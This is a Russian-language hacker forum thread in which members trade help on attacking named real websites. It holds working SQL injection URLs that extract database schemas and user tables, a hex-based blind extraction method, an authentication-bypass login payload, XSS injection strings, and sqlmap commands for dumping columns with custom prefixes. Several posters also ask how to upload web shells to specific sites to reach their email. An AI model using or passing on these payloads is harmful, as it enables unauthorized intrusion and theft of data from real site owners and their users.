В общем есть проблемная скуля Code: http://www.sevseun.com/downloads.php?page_id=-1075%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+ На которой видны пинтабельные поля, но получить от них что-либо (нр. version() ) выбивает чистую страницу. Расскажите, что за фигня!
Спасибо ребятулечки, но там другая фигня получилась. Code: http://www.sevseun.com/downloads.php?page_id=-1075%27+union+select+1,2,3,4,Column_name,6,7,8,9,10,11,12,13,14,15,16+from+information_scheMa.columns+where+table_name=%27users%27+limit+2,1+--+ вообщем есть столбец username & password, но туда не пускает, мб зарегистрироваться надо. А насчёт скобок тоже отдельное спасибо, но можно поочередно вытянуть используя их. II. Code: http://fmf.npi-tu.ru/index.php?id=3+union+select+1,2,3,4,5,6,7,8,9,10,11+--+ - не выводит пентабельное поле.
Зачем регистрироватся, если ты работаешь с БД ? Table 'sevseun.users' doesn't exist Нету прав у юзера на доступ к этой таблице.
Подскажите пожалуйста по вопросу sql inj. Нашел уязвимую админку, хочу создать запрос для проникновения без пароля. Есть 2 поля: Логин и Пароль <input name="username" tabindex="1" size="25" id="username" type="text"> <input name="password" tabindex="2" size="25" id="password" type="password"> В поле username ввожу '1 В поле password ввожу '2 На что выдает мне: DB Error: syntax error SELECT NAME, PASSWORD FROM USER WHERE NAME = ''1' AND state = '0' [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' AND state = '0'' at line 2] Далее пробую вставить запрос такого вида в поле username admin' or '1'='1' AND password='' or '1'='1' На что выдает следующее: DB Error: syntax error SELECT NAME, PASSWORD FROM USER WHERE NAME = 'admin' or '1'='1' AND password='' or '1'='1'' AND state = '0' [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0'' at line 2] Как правильно составить запрос?
Возникло парочку вопросов: 1. Code: http://www.nova-plosha.com/index.php?hl=ru&idd=cat&cat=13955%27 - невозможно подобрать кол-во столбцов. 2. Есть место для заливки шелла, но когда заливаешь неизвестно где он пропадает.. Code: http://kerch.biz/upload/ в категории archive; photos - не обнаружено. 3. Code: http://www.auto-alliance.org/item.php?id=6319+And+1=-0+union+select+version%28%29+--+ - не выводится пентабельное поле. 4. Code: http://fmf.npi-tu.ru/index.php?id=3+union+select+1,2,3,4,5,6,7,8,9,10,1 1+--+ - аналогично, не выводится пентабельное поле.
lolwut? Почему ты утверждаешь, что к таблице нету доступа, когда ошибка говорит об отсутствии таблицы как таковой? MySQL шутник тот еще, шутки шутит, ага. Таблица находится в другой БД, хакер. Code: http://www.sevseun.com/downloads.php?page_id=1075%27+and+0+union+select+1,2,3,4,[B]TABLE_SCHEMA[/B],6,7,8,9,10,11,12,13,14,15,16+from+information_scheMa.columns+where+table_name=%27users%27+limit+0,1--%20a -- aukro Code: http://www.sevseun.com/downloads.php?page_id=1075%27+and+0+union+select+1,2,3,4,username,6,7,8,9,10,11,12,13,14,15,16+from+[B]aukro.users[/B]--%20a ... Звучит крайне прохладно. Unknowhacker, что такое "пентабельное поле"? Я могу понять не выговаривать букву "р", но не иметь возможности ее написать это что-то новенькое. И по поводу http://www.auto-alliance.org/item.php?id=6319+And+1=-0+union+select+version%28%29+--+ Вывод там есть, в ошибке, что ниже. Но на вывод возможны только числовые значения, так еще и определенной длины. Объяснять более подробно, что там происходит просто впадлу, да и бессмысленно =\ Code: http://www.auto-alliance.org/item.php?id=6319%20and(0)%20UNION%20SELECT%20hex(mid(user(),[B]1[/B],2))--%20a http://www.auto-alliance.org/item.php?id=6319%20and(0)%20UNION%20SELECT%20hex(mid(user(),[B]3[/B],2))--%20a http://www.auto-alliance.org/item.php?id=6319%20and(0)%20UNION%20SELECT%20hex(mid(user(),[B]5[/B],2))--%20a http://www.auto-alliance.org/item.php?id=6319%20and(0)%20UNION%20SELECT%20hex(mid(user(),[B]7[/B],2))--%20a Инкриминируем это число на 2, пока не будет нуля и полученные значения записываем (полученные значения будут выводится тут Error loading image: /image2.php?id=[NUM]), потом полученный результат анхексаем и получаем заветные данные.
Доброго времени суток. Есть сайт вида www.site.com/find.jsp?f= попробовал подставить Code: "><script>alert('xss')</script> в исходнике Code: <input type="text" name="f" value=""><script>alert('xss')</script>"/> тег не закрылся. Тогда сделал так Code: "><script>alert('xss')</script><input type="text" name="f" value=" . Скрипт нормально вставился и не фильтровался Code: <input type="text" name="f" value=""><script>alert('xss')</script><input type="text" name="f" value=""/> , но заветного окошка я так и не увидел, что не так?
Подскажите по sqlmap. Задача: сдампить определенные колонки в таблице Code: python sqlmap.py -u http://site.ru?a=inject --dump -D db_name -T table_name -C column1 В вышеприведенном коде сдампится column1 , а мне нужно еще column2. Как синтаксически правильно дописать вторую колонку?
1) http://armtoday.info/Lang=_Ru&mode=allwords&search=%Inject_Here%&SectionID=-1&submit=%d5%88%d6%80%d5%b8%d5%b6%d5%a5%d5%ac не как не смог сглмапом так же Хавижом( в чем проблема не пойму( 2) aztexnika.az/upload.php aztexnika.az/admin/upload.php нужно залить шелл. нужен доступ емаилу с этого сайта(
Есть уязвимость. SQLi Предположим так (заменил дабы не палить): Url: http://www.site.com/threadrate.php?t=104496 Method: post Param: securitytoken Payload: "));SELECT+SLEEP(15)/* Data: securitytoken=guest&t=104496&pp=10&page=1&vote=5 как верно составить запрос sqlmap с payload'ом чтоб было? Нигде в инете ни в документах не найти как сделать свой payload. А без него уязвимость не видит. Прошу, помогите
Прежде чем говорить - проверьте. HTML: sqlmap --help За payload отвечает две опции: --prefix=PREFIX Injection payload prefix string --suffix=SUFFIX Injection payload suffix string соответственно Ваш запрос будет примерно таким: PHP: sqlmap --url="http://www.site.com/threadrate.php?t=104496" --data="securitytoken=guest*&t=104496&pp=10&page=1&vote=5" --prefix="));" --dbms="MySQL"
Для начала спасибо вам, попробую. А так я и вправду видел это, но как это применять в команде не понимал. Тоесть если у меня: Payload: '"%2bSLEEP(15)-- то команда будет включать Code: --prefix=""%2b" ?